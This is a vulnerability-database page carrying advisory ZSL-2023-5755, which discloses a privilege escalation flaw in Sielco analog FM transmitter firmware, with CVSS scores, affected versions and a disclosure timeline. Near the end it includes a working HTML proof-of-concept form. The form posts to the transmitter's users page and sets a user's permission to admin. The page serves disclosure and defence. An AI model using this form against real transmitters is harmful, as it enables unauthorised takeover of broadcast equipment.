Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2023-5755
HistoryMar 28, 2023 - 12:00 a.m.

Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation

2023-03-2800:00:00
Gjoko Krstic
zeroscience.mk
125
sielco s.r.l
vulnerability
privilege escalation
http post request
vendor status
poc
gjoko krstic
exploit
advisory id
impact
risk
release date
fm transmitter
professional broadcasting
digital
analogue
read permissions
write permissions
admin permissions
affected version
tested on
csirt italia
public security advisory
references
changelog
contact
zero science lab

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

9 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

19.3%

JSON

Title: Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation
Advisory ID: ZSL-2023-5755
Type: Local/Remote
Impact: Privilege Escalation
Risk: (4/5)
Release Date: 28.03.2023

Summary

Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China.

Description

The application suffers from a privilege escalation vulnerability. A user with Read permissions can elevate his/her privileges by sending a HTTP POST request setting the parameter ‘auth1’ or ‘auth2’ or ‘auth3’ to integer value ‘1’ for Write or ‘2’ for Admin permissions.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)

Tested On

lwIP/2.1.1
Web/3.0.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[27.03.2023] No response from the vendor.
[27.03.2023] No response from the CSIRT team.
[28.03.2023] Public security advisory released.

PoC

sielco_fm_eop.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/51366&gt;
[2] <https://packetstormsecurity.com/files/171842/&gt;
[3] <https://cxsecurity.com/issue/WLB-2023040059&gt;
[4] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08&gt;
[5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-41966&gt;
[6] <https://nvd.nist.gov/vuln/detail/CVE-2023-41966&gt;
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253074&gt;
[8] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269709&gt;

Changelog

[28.03.2023] - Initial release
[02.11.2023] - Added reference [1], [2], [3], [4], [5], [6], [7] and [8]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--

Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending
a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'
to integer value '1' for Write or '2' for Admin permissions.

Tested on: lwIP/2.1.1
           Web/3.0.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5755
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php


26.01.2023

--><html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input name="pwd0" type="hidden" value=""/>
<input name="pwd0bis" type="hidden" value=""/>
<input name="user1" type="hidden" value=""/>
<input name="pwd1" type="hidden" value=""/>
<input name="pwd1bis" type="hidden" value=""/>
<input name="auth1" type="hidden" value=""/>
<input name="user2" type="hidden" value="test"/>
<input name="pwd2" type="hidden" value=""/>
<input name="pwd2bis" type="hidden" value=""/>
<input name="auth2" type="hidden" value="2"/>
<input name="user3" type="hidden" value=""/>
<input name="pwd3" type="hidden" value=""/>
<input name="pwd3bis" type="hidden" value=""/>
<input name="auth3" type="hidden" value=""/>
<input type="submit" value="Escalate"/>
</form>
</body>
</html>

Related

cve 1
zeroscience 1
prion 1
nvd 1
cvelist 1
ics 1
cve
cve
CVE-2023-41966
2023-10-26 17:15:08
zeroscience
zeroscience
Sielco Radio Link 2.06 Remote Privilege Escalation
2023-03-30 00:00:00
prion
prion
Privilege escalation
2023-10-26 17:15:00
nvd
nvd
CVE-2023-41966
2023-10-26 17:15:08
cvelist
cvelist
CVE-2023-41966 Sielco Radio Link and Analog FM Transmitters Privilege Defined With Unsafe Actions
2023-10-26 16:21:56
ics
ics
Sielco Radio Link and Analog FM Transmitters
2023-10-26 12:00:00

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

9 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

19.3%

JSON
Related for ZSL-2023-5755
cve1zeroscience1prion1nvd1cvelist1ics1